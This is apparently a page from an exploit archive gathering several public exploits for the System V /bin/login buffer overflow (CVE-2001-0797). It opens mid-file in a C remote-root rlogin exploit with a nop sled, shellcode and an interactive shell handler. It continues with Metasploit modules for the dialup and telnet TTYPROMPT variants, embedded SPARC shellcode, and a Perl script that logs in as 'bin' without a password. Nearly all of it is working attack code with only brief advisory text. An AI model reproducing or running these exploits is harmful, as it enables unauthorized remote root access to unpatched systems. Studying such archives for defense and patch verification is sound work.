	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* parse command line */
	if (argc < 2)
		usage(argv[0]);

	while ((c = getopt(argc, argv, "dh:t:")) != EOF)
		switch(c) {
		case 'h':
			host = optarg;
			break;
		case 't':
			timeout = atoi(optarg);
			break;
		case 'd':
			debug = 1;
			break;
		default:
			usage(argv[0]);
		}

	if (!host)
		usage(argv[0]);

	/* connect to the target host */
	fd = net_connect(host, 513, 10);
	fprintf(stderr, "# connected to remote host: %s\n", host);

	/* signal handling */
	signal(SIGPIPE, SIG_IGN);

	/* begin the rlogin session */
	memset(buf, 0, sizeof(buf));

	if (send(fd, buf, 1, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	if (net_read(fd, buf, sizeof(buf), timeout) < 0)
		fatalerr("error", "Timeout reached in rlogin session", fd);

	/* dummy rlogin authentication */
	memcpy(p, "foo", 3);		// local login name
	p += 4;
	memcpy(p, "bar", 3);		// remote login name
	p += 4;
	memcpy(p, term, sizeof(term));	// terminal type
	p += sizeof(term);

	fprintf(stderr, "# performing dummy rlogin authentication\n");
	if (send(fd, buf, p - buf, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for password prompt", fd);

	/* send a dummy password */
	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for login prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# waiting for login prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "ogin: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for login prompt", fd);

	fprintf(stderr, "# returning into 0x%08x\n", RETADDR);

	/* for debugging purposes */
	if (debug) {
		printf("# debug: press enter to continue");
		scanf("%c", &c);
	}

	/* prepare the evil buffer */
	memset(buf, 0, sizeof(buf));
	p = buf;

	/* login name */
	memcpy(p, "foo ", 4);
	p += 4;

	/* return address (env) */
	set_val(p, 0, RETADDR);
	p += 4;
	memcpy(p, " ", 1);
	p++;

	/* trigger the overflow (env) */
	for (i = 0; i < 60; i++, p += 2)
		memcpy(p, "a ", 2);

	/* padding */
	memcpy(p, " BBB", 4);
	p += 4;

	/* nop sled and shellcode */
	for (i = 0; i < 398; i++, p += 4)
		memcpy(p, sparc_nop, 4);
	p += sc_copy(p, sc, sizeof(sc) - 1);

	/* padding */
	memcpy(p, "BBB ", 4);
	p += 4;

	/* pam_handle_t: minimal header */
	memcpy(p, "CCCCCCCCCCCCCCCC", 16);
	p += 16;
	set_val(p, 0, RETADDR);	// must be a valid address
	p += 4;
	set_val(p, 0, 0x01);
	p += 4;

	/* pam_handle_t: NULL padding */
	for (i = 0; i < 52; i++, p += 4)
		set_val(p, 0, 0x00);

	/* pam_handle_t: pameptr must be the 65th ptr */
	memcpy(p, "\x00\x00\x00 AAAA\n", 9);
	p += 9;

	/* send the evil buffer, 256 chars a time */
	len = p - buf;
	p = buf;
	while (len > 0) {
		fprintf(stderr, "#");
		i = len > 0x100 ? 0x100 : len;
		send(fd, p, i, 0);
		len -= i;
		p += i;
		if (len)
			send(fd, "\x04", 1, 0);
		usleep(500000);
	}
	fprintf(stderr, "\n");
	
	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	fprintf(stderr, "# password prompt received, waiting for shell\n");

	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for shell prompt */
	memset(buf, 0, sizeof(buf));
	found = 0;

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "# ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	/* connect to the remote shell */
	fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
	shell(fd);

	exit(0);
}

/*
 * exploit_addchar(): char translation for pam (ripped from scut)
 */
int exploit_addchar(unsigned char *ww, unsigned char wc)
{
	unsigned char * wwo = ww;

	switch (wc) {
	case ('\\'):
		*ww++ = '\\';
		*ww++ = '\\';
		break;
	case (0xff):
	case ('\n'):
	case (' '):
	case ('\t'):
		*ww++ = '\\';
		*ww++ = ((wc & 0300) >> 6) + '0';
		*ww++ = ((wc & 0070) >> 3) + '0';
		*ww++ = (wc & 0007) + '0';
		break;
	default:
		*ww++ = wc;
		break;
	}

	return (ww - wwo);
}

/*
 * fatalerr(): error handling routine
 */
void fatalerr(char *func, char *error, int fd)
{
	fprintf(stderr, "%s: %s\n", func, error);
	close(fd);
	exit(1);
}

/*
 * net_connect(): simple network connect with timeout
 */
int net_connect(char *host, int port, int timeout)
{
	int			fd, i, flags, sock_len;
	struct sockaddr_in	sin;
	struct timeval		tv;
	fd_set			fds;

	/* allocate a socket */
	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("socket");
		exit(1);
	}

	/* bind a privileged port (FIXME) */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	for (i = 1023; i > 0; i--) {
		sin.sin_port = htons(i);
		if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
			break;
	}
	if (i == 0)
		fatalerr("error", "Can't bind a privileged port (must be root)", fd);

	/* resolve the peer address */
	sin.sin_port = htons(port);
	if (!(sin.sin_addr.s_addr = net_resolve(host)))
		fatalerr("error", "Can't resolve hostname", fd);

	/* set non-blocking */
	if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
		fatalerr("fcntl", strerror(errno), fd);

	/* connect to remote host */
	if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
		if (fcntl(fd, F_SETFL, flags) < 0)
			fatalerr("fcntl", strerror(errno), fd);
		return(fd);
	}
	if (errno != EINPROGRESS)
		fatalerr("error", "Can't connect to remote host", fd);

	/* set timeout */
	tv.tv_sec = timeout;
	tv.tv_usec = 0;

	/* setup select structs */
	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select */
	if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
		fatalerr("error", "Can't connect to remote host", fd);
	
	/* check if connected */
	sock_len = sizeof(sin);
	if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
		fatalerr("error", "Can't connect to remote host", fd);
	if (fcntl(fd, F_SETFL, flags) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	return(fd);
}

/*
 * net_read(): non-blocking read from fd
 */
int net_read(int fd, char *buf, int size, int timeout)
{
	fd_set		fds;
	struct timeval	wait;
	int		n = -1;

	/* set timeout */
	wait.tv_sec = timeout;
	wait.tv_usec = 0;

	memset(buf, 0, size);

	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select with timeout */
	if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
		perror("select");
		exit(1);
	}

	/* read data if any */
	if (FD_ISSET(fd, &fds))
		n = read(fd, buf, size);

	return n;
}

/*
 * net_resolve(): simple network resolver
 */
int net_resolve(char *host)
{
	struct in_addr	addr;
	struct hostent	*he;

	memset(&addr, 0, sizeof(addr));

	if ((addr.s_addr = inet_addr(host)) == -1) {
		if (!(he = (struct hostent *)gethostbyname(host)))
			return(0);
		memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
	}
	return(addr.s_addr);
}

/*
 * sc_copy(): copy the shellcode, using exploit_addchar()
 */
int sc_copy(unsigned char *buf, char *str, long len)
{
	unsigned char	*or = buf;
	int 		i;

	for(i = 0; i < len; i++)
		buf += exploit_addchar(buf, str[i]);

	return(buf - or);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] =	(val & 0xff000000) >> 24;
	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
	buf[pos + 3] =	(val & 0x000000ff);
}

/*
 * shell(): semi-interactive shell hack
 */
void shell(int fd)
{
	fd_set	fds;
	char	tmp[128];
	int	n;

	/* quote Hvar 2004 */
	fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");

	/* execute auto commands */
	write(1, "# ", 2);
	write(fd, CMD, strlen(CMD));

	/* semi-interactive shell */
	for (;;) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		FD_SET(0, &fds);

		if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
			perror("select");
			break;
		}

		/* read from fd and write to stdout */
		if (FD_ISSET(fd, &fds)) {
			if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
				fprintf(stderr, "Goodbye...\n");
				break;
			}
			if (write(1, tmp, n) < 0) {
				perror("write");
				break;
			}
		}

		/* read from stdin and write to fd */
		if (FD_ISSET(0, &fds)) {
			if ((n = read(0, tmp, sizeof(tmp))) < 0) {
				perror("read");
				break;
			}
			if (write(fd, tmp, n) < 0) {
				perror("write");
				break;
			}
		}
	}

	close(fd);
	exit(1);
}

void usage(char *progname)
{
	fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
	fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
	fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
	fprintf(stderr, "-d\t\tturn on debug mode\n\n");
	exit(1);
}

// milw0rm.com [2004-12-24]
		

- 漏洞信息 (10036)

System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) (EDBID:10036)
solaris remote
2001-12-12 Verified
0 I)ruid
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'	=> %q{
				This exploit connects to a system's modem over dialup and exploits
				a buffer overlflow vulnerability in it's System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
         'References'     =>
            [
               [ 'CVE', '2001-0797'],
               [ 'OSVDB', '690'],
               [ 'OSVDB', '691'],
               [ 'BID', '3681'],
               [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
               [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
            ],
			'Version'	=> '$Revision: 6479 $',
			'Author'	=>
				[
					'I)ruid',
				],
			'Arch'		=> ARCH_TTY,
			'Platform'	=> ['unix'],
			'License'	=> MSF_LICENSE,
         'Payload'        =>
            {
               'Space'       => 3000,
               'BadChars'    => '',
			   	'DisableNops' => true,
            },
         'Targets'        =>
            [
               ['Solaris 2.6 - 8 (SPARC)', {
						'Platform' => 'unix',
						'Ret'      => 0x00027184,
						# Solaris/SPARC special shellcode (courtesy of inode)
						# execve() + exit()
						'Shellcode' => 
							"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
							"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
							"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
							"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
						'NOP' => "\x90\x1b\x80\x0e",
					} ],

            ],
         'DefaultTarget' => 0
		))

		register_options(
			[
#				OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class
		)

		deregister_options(
		)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']

		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			c = b.chr
			case 'c'
			when "\\"
				buf[i,2] = "\\\\"
				i += 2
			when "\xff", "\n", " ", "\t"
				buf[i,1] = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
				buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
				buf[i+3,1] = ( (b & 0007)       + '0').chr
				i += 4
			else
				buf[i,1] = c
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")

		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
#			if len > 0
#				puts Rex::Text.to_hex_dump("\x04")
#				dialup_puts("\x04") if len > 0
#			end
			sleep 0.5
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match] 
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end	

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")

		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler

		disconnect_dialup
	end

end
		

- 漏洞信息 (16327)

Solaris in.telnetd TTYPROMPT Buffer Overflow (EDBID:16327)
solaris remote
2010-06-22 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ttyprompt.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
			'Description'    => %q{
				This module uses a buffer overflow in the Solaris 'login'
			application to bypass authentication in the telnet daemon.
			},
			'Author'         => [ 'MC', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'BID', '5531'],

				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => '',
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					['Automatic', { }],
				],
			'DisclosureDate' => 'Jan 18 2002',
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(23),
					OptString.new('USER', [ true, "The username to use",     "bin" ]),
				], self.class)
	end

	def exploit
		connect

		banner = sock.get_once

		print_status('Setting TTYPROMPT...')

		req =
			"\xff\xfc\x18" +
			"\xff\xfc\x1f" +
			"\xff\xfc\x21" +
			"\xff\xfc\x23" +
			"\xff\xfb\x22" +
			"\xff\xfc\x24" +
			"\xff\xfb\x27" +
			"\xff\xfb\x00" +
			"\xff\xfa\x27\x00" +
			"\x00TTYPROMPT" +
			"\x01" +
			rand_text_alphanumeric(6) +
			"\xff\xf0"

		sock.put(req)
		select(nil,nil,nil,0.25)

		print_status('Sending username...')

		filler = rand_text_alpha(rand(10) + 1)

		req << datastore['USER'] + (" #{filler}" * 65)

		sock.put(req + "\n\n\n")

		select(nil,nil,nil,0.25)
		sock.get_once

		sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")

		select(nil,nil,nil,0.25)

		handler
	end

end

		

- 漏洞信息 (16928)

System V Derived /bin/login Extraneous Arguments Buffer Overflow (EDBID:16928)
linux remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: manyargs.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'	=> %q{
					This exploit connects to a system's modem over dialup and exploits
				a buffer overlflow vulnerability in it's System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'OSVDB', '691'],
					[ 'BID', '3681'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
				],
			'Version'	=> '$Revision: 9669 $',
			'Author'	=>
				[
					'I)ruid',
				],
			'Arch'		=> ARCH_TTY,
			'Platform'	=> ['unix'],
			'License'	=> MSF_LICENSE,
			'Payload'        =>
				{
					'Space'       => 3000,
					'BadChars'    => '',
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					[ 'Solaris 2.6 - 8 (SPARC)',
						{
							'Platform' => 'unix',
							'Ret'      => 0x00027184,
							# Solaris/SPARC special shellcode (courtesy of inode)
							# execve() + exit()
							'Shellcode' =>
								"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
								"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
								"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
								"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
							'NOP' => "\x90\x1b\x80\x0e",
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 12 2001'))

		register_options(
			[
#				OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']

		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			c = b.chr
			case 'c'
			when "\\"
				buf[i,2] = "\\\\"
				i += 2
			when "\xff", "\n", " ", "\t"
				buf[i,1] = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
				buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
				buf[i+3,1] = ( (b & 0007)       + '0').chr
				i += 4
			else
				buf[i,1] = c
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")

		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
#			if len > 0
#				puts Rex::Text.to_hex_dump("\x04")
#				dialup_puts("\x04") if len > 0
#			end
			select(nil,nil,nil,0.5)
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")

		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler

		disconnect_dialup
	end

end
		

- 漏洞信息 (21179)

Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability (EDBID:21179)
solaris remote
2003-01-09 Verified
0 snooq
N/A [点击下载]
source: http://www.securityfocus.com/bid/3681/info

The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.

Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.

Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges. 

#!/usr/bin/perl
#
#  Date: 09/01/2003
#  Author: snooq [http://www.angelfire.com/linux/snooq/]
#
#  I coded this script to demo how to login to a Solaris box without
#  password as 'bin'. Nothing new, it's an old bug which dates back 
#  to Dec 2001.
# 
#  And, there are already several versions of exploits circulating 
#  in the wild for at least a year now. 
#  
#  Due to uninformed/incompetent/ignorant sysadmins, there are still 
#  quite a number of vulnerable machines out there.
#  
#  'root' remote login is not allowed by defaut. So, unless, it's
#  a misconfigured box, you can only go as high as 'bin'. However,
#  once you are dropped into a shell, further priviledge escalation is
#  very possible.
#
#  Background info
#  ===============
#  From http://www.mail-archive.com/bugtraq@securityfocus.com/msg09281.html
#
#  [quote]
#  The problem is there exists an authentication flag called the "fflag" 
#  just after the array that gets overflowed in the .bss segment. This is
#  an array of char pointers so when it is overflowed because of an
#  mismanagement on the indexing of this array the fflag gets overwritten
#  with an valid address on .bss segment. this is good enough to satify 
#  the if(fflag) condition and spawn a shell.
#  [/quote]
#
#  For more info about this bug, go to:
#  http://www.cert.org/advisories/CA-2001-34.html
#
#  Disclaimer
#  ==========
#  This is meant for you to do a quick check own your systems only.
#  The author shall not be held responsible for any illegal use 
#  of this code. 
#
#  -> some asked 'why code another one?' 
#  I'm bored.. I guess.... been using other ppl's tools... it's time 
#  to write my own.. so that I have a reason to feel proud too... 
#  
#  -> again, some asked 'why not in C?'
#  ok... I'm lame.. my C sucks... my Perl sucks too...
#  I'm not a professional programmer anyway... =p
#
#  As usual, any comments or flames, go to jinyean at hotmail.com
#
use Socket;
use FileHandle;

if ($ARGV[0] eq '') {
	print "Usage: $0 <host>\n";
	exit;
}

$payload="\xff\xfc\x18"		# Won't terminal type
	."\xff\xfc\x1f"		# Won't negotiate window size
	."\xff\xfc\x21"		# Won't remote flow control
	."\xff\xfc\x23"		# Won't	X display location
	."\xff\xfb\x22"		# Will linemode	
	."\xff\xfc\x24"		# Won't environment option
	."\xff\xfb\x27"		# Will new environment option	
	."\xff\xfb\x00"		# Will binary transmission
	."\xff\xfa\x27\x00"	# My new environ option
	."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54"	# 'TTYPROMPT'
	."\x01\x61\x62\x63\x64\x65\x66"			# 'abcdef', any 6 chars will do
	."\xff\xf0";		# Suboption end
$port=23;
$user="bin";			# You may change this to another user
$addr=getaddr($ARGV[0]);

for ($i;$i<65;$i++) {
	$user.=" c";		# Again, any char will do
}

socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";

print "/bin/login array mismanagment exploit by snooq (jinyean\@hotmail.com)\n";
print "Connected. Wait for a shell....\n";

SOCKET->autoflush();

$pid=fork;

if ($pid) {			# Parent reads	
	send(SOCKET, $payload, 0);
	send(SOCKET, "$user\n", 0);
	read(SOCKET,$buff,69);	# Read the garbage
	while (<SOCKET>) {;
       		print STDOUT $_;
    	}
}
else {				# Child sends
	print SOCKET while (<STDIN>);
	close SOCKET;
}
exit;

sub getaddr {

	my $host=($_[0]);
	my $n=$host;
	$n=~tr/\.//d;

	if ($n=~m/\d+/) {
		return pack('C4',split('\.',$host));
	}
	else {
		return (gethostbyname($host))[4];
	}
}
		

- 漏洞信息 (21180)

Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability (EDBID:21180)
solaris remote
2004-12-04 Verified
0 Marco Ivaldi
N/A [点击下载]
source: http://www.securityfocus.com/bid/3681/info
 
The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.
 
Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.
 
Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges. 

/*
 * $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Buffer overflow in login in various System V based operating systems 
 * allows remote attackers to execute arbitrary commands via a large number 
 * of arguments through services such as telnet and rlogin (CVE-2001-0797).
 *
 * Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
 *
 * This remote root exploit uses the (old) System V based /bin/login 
 * vulnerability via the rlogin attack vector, returning into the .bss 
 * section to effectively bypass the non-executable stack protection
 * (noexec_user_stack=1 in /etc/system).
 *
 * Many thanks to scut <scut@nb.in-berlin.de> (0dd) for his elite pam_handle_t
 * technique (see 7350logout.c), also thanks to inode <inode@deadlocks.info>.
 *
 * Usage (must be root):
 * # gcc raptor_rlogin.c -o raptor_rlogin -Wall
 * [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
 * # ./raptor_rlogin -h 192.168.0.50
 * [...]
 * # id;uname -a;uptime;
 * uid=0(root) gid=0(root)
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 *   7:45pm  up 12 day(s), 18:42,  1 user,  load average: 0.00, 0.00, 0.01
 * #
 *
 * Vulnerable platforms (SPARC):
 * Solaris 2.5.1 without patch 106160-02 [untested]
 * Solaris 2.6 without patch 105665-04 [untested]
 * Solaris 7 without patch 112300-01 [untested]
 * Solaris 8 without patch 111085-02 [tested]
 */

#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
